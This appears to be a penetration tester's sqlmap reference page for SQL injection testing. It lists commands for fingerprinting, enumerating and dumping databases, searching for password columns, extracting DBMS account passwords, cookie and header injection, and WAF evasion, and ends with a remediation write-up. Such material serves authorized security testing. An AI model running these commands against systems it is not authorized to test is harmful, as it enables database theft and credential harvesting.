π‘οΈ Methodology Checklist
- Test GET param:
sqlmap -u "http://[TARGET]/page?id=1" - Test POST param:
sqlmap -u [URL] --data "user=admin&pass=test" - Specify param:
sqlmap -u [URL] -p id - Use Burp request file:
sqlmap -r request.txt - Enumerate databases:
sqlmap -u [URL] --dbs - Enumerate tables:
sqlmap -u [URL] -D [DB] --tables - Dump table:
sqlmap -u [URL] -D [DB] -T [TABLE] -C [COLS] --dump - Batch mode (no prompts):
--batch
π― Operational Context
Use when: SQL injection confirmed or suspected β automated enumeration, extraction, and exploitation of SQL injection vulnerabilities.
Think Dumber First: Save the request in Burp (Right-click β Save item). Then sqlmap -r request.txt --batch --dbs β SQLMap reads the full request including cookies and headers. This is simpler than constructing the URL manually.
Skip when: Manual injection already achieved full data extraction β SQLMap automation adds noise and detection risk for diminishing returns.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
sqlmap -u 'http://[TARGET_IP]/page.php?id=1' | Basic GET scan |
sqlmap -u 'http://[TARGET_IP]/' --data='uid=1&name=test' | POST data scan |
sqlmap -u 'http://[TARGET_IP]/' --data='uid=1*&name=test' | Asterisk * marks exact injection point |
sqlmap -u 'http://[TARGET_IP]/' --data='uid=1' -p uid | Restrict to specific parameter |
sqlmap -r request.txt | Feed raw Burp request file |
sqlmap -r request.txt --batch --dump -T users | Auto-answer prompts + dump table |
sqlmap -u 'http://[TARGET_IP]/' --cookie='id=1*' | Inject into cookie |
sqlmap -u 'http://[TARGET_IP]/' -H='Authorization: Bearer [TOKEN]' | Custom header |
sqlmap -u 'http://[TARGET_IP]/' --random-agent | Random User-Agent (bypass WAF signature check) |
sqlmap -u 'http://[TARGET_IP]/?id=1' --banner --current-user --current-db --is-dba | Quick environment fingerprint |
sqlmap -u 'http://[TARGET_IP]/?id=1' -D [DB] --tables | List tables in database |
sqlmap -u 'http://[TARGET_IP]/?id=1' -D [DB] -T [TABLE] --dump | Dump table |
sqlmap -u 'http://[TARGET_IP]/?id=1' -D [DB] -T [TABLE] -C col1,col2 | Dump specific columns |
sqlmap -u 'http://[TARGET_IP]/?id=1' -D [DB] -T [TABLE] --start=1 --stop=10 | Dump row range |
sqlmap -u 'http://[TARGET_IP]/?id=1' -D [DB] -T [TABLE] --dump --where="name LIKE 'f%'" | Conditional dump |
sqlmap -u 'http://[TARGET_IP]/?id=1' --dump-all --exclude-sysdbs | Dump all non-system DBs |
sqlmap -u 'http://[TARGET_IP]/?id=1' --parse-errors | Print raw DB errors to console |
sqlmap -u 'http://[TARGET_IP]/?id=1' -v 3 | Show payloads only (no HTML flood) |
sqlmap -u 'http://[TARGET_IP]/?id=1' -v 6 | Full HTTP traffic verbosity |
sqlmap -u 'http://[TARGET_IP]/?id=1' --proxy="http://127.0.0.1:8080" | Route through Burp |
sqlmap -u 'http://[TARGET_IP]/?id=1' --fresh-queries --flush-session | Clear session cache |
π¬ Deep Dive & Workflow
BEUSTQ Technique Reference
| Letter | Technique | Speed | When to use |
|---|---|---|---|
| B | Boolean-blind | Medium | Universal fallback |
| E | Error-based | Fast | DB errors visible in response |
| U | UNION-based | Fastest | Visible output columns |
| S | Stacked queries | Variable | RCE/DDL; needs MSSQL/PostgreSQL |
| T | Time-based blind | Slowest | UPDATE/INSERT (no output) |
| Q | Inline query | Rare | Specific app architecture |
Force specific techniques: --technique=BEU (skip slow time-based).
Request Configuration
# Copy as cURL from browser β replace 'curl' with 'sqlmap'
# Burp request file (most reliable for complex POST/JSON)
sqlmap -r request.txt
# JSON POST inline
sqlmap -u 'http://[TARGET_IP]/' --data='{"id":1}' --method PUT
# Cookie injection
sqlmap -u 'http://[TARGET_IP]/' --cookie='id=1*' --random-agent
# Header injection
sqlmap -u 'http://[TARGET_IP]/' -H='User-Agent: *'Enumeration Workflow
# Step 1: Fingerprint environment
sqlmap -u "http://[TARGET_IP]/?id=1" --banner --current-user --current-db --is-dba
# Step 2: List tables
sqlmap -u "http://[TARGET_IP]/?id=1" -D mydb --tables
# Step 3: Dump target table
sqlmap -u "http://[TARGET_IP]/?id=1" -D mydb -T users --dump
# Step 4: Search for sensitive columns (when DB is huge)
sqlmap -u "http://[TARGET_IP]/?id=1" --search -C pass
sqlmap -u "http://[TARGET_IP]/?id=1" --search -T user
# Step 5: Schema map (structure without data)
sqlmap -u "http://[TARGET_IP]/?id=1" --schema
# Step 6: DBMS service account passwords
sqlmap -u "http://[TARGET_IP]/?id=1" --passwordsAlways use -D flag β omitting it defaults to current DB context (may miss target data).
Always use --exclude-sysdbs with --dump-all β system DBs waste hours.
Debugging
--parse-errors β reveal raw SQL errors (tells you query structure)
-t /tmp/traffic.txt β save all HTTP to file (for long scans)
--proxy=http://127.0.0.1:8080 β route to Burp for manual inspection
-v 3 β payloads only
-v 6 β everything (noisy)
--fresh-queries --flush-session β if scan behaves strangely (stale cache)If --parse-errors reveals the exact query structure β manual exploit via Burp Repeater may be faster.
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| SQLMap returns βnot injectableβ | Wrong parameter targeted | Specify param: -p username; or use --level=5 --risk=3 for aggressive testing |
| SQLMap hangs indefinitely | Target too slow or blocked | Add --timeout=30 --retries=2; use --technique=B (boolean only) to skip time-based |
| Cookies not included | Session required | Add cookie: --cookie='session=...' or save full Burp request with -r request.txt |
| SQLMap detects but canβt extract | DB user has no SELECT on target table | Try --privileges to check; extract from accessible tables only |
| sqlmap.py not found | Package issue | Use python3 /usr/share/sqlmap/sqlmap.py or install via pip: pip3 install sqlmap |
π Reporting Trigger
Finding Title: SQL Injection Confirmed and Exploited via SQLMap Impact: Automated SQLMap exploitation confirms SQL injection with complete database enumeration, table extraction, and credential harvesting, demonstrating that the vulnerability is exploitable with publicly available tools requiring no specialized knowledge. Root Cause: User input passed unsanitized to SQL queries. Lack of input validation or parameterization in database interaction layer. Recommendation: Implement prepared statements universally. Conduct code review of all database interaction points. Deploy WAF as compensating control. Run automated SQLi testing in CI/CD pipeline to detect regressions.